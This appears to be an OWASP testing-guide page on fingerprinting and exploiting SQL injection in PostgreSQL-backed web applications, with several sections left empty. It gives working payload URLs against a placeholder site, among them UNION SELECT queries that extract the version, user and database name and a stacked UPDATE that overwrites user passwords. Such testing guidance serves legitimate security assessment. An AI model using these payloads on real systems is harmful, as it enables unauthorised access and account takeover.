OWASP Backend Security Project Testing PostgreSQL

= Overview =

= Description =

Identifing PostgreSQL
When a SQL Injection has been found you need to carefully fingerprint backend database engine. DBMS Fingerprint paragraph allready discussed how to accomplish this task.

PostgreSQL Peculiarities
PHP Connector allow multiple statements to be executed by using ; as a statement seperator. SQL Statement can be truncated on vulnerable URL by appending comment char: --.

Example: * http://www.example.com/store.php?id=1--hello world * http://www.example.com/store.php?id=1;--hello world

Banner Grabbing
Function version can be used to accomplish this task.

select version: PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

Example:

http://www.example.com/store.php?id=1 Acme Biscuits

http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version,NULL LIMIT 1 OFFSET 1-- PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

Single Quote (un)Escape
String can be encoded, to prevent single quotes escaping, by using chr function.

* chr(n): Returns the character whose ascii value corresponds to the number * ascii(n): Returns the ascii value corresponds to the character

Let say you want to encode the string 'root': select ascii('r') 114  select ascii('o') 111  select ascii('t') 116

We can encode 'root' with: chr(114)||chr(111)||chr(111)||chr(116)

Example: http://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--

Current User
Current user can be retrieved with the following SQL SELECT statements:

SELECT user SELECT current_user SELECT session_user SELECT usename FROM pg_user SELECT getpgusername

Examples: http://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL-- http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL--

Current Database
Native function current_database return current database name.

Example:

http://www.example.com/store.php?id=1 UNION ALL SELECT current_database,NULL,NULL--

Smashing dblink
= References =

= Tools =